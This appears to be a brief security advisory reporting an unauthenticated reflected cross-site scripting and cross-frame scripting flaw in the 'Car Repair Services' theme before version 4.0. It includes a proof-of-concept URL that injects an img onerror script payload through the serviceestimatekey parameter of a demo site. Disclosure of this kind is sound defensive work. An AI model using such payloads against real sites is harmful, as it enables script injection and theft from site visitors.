Car Repair Services < 4.0 - Unauthenticated Reflected XSS & XFS

Description

The theme did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue

Proof of Concept

https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=<img+src%3Dx+onerror%3Dalert(`m0ze`)%3B>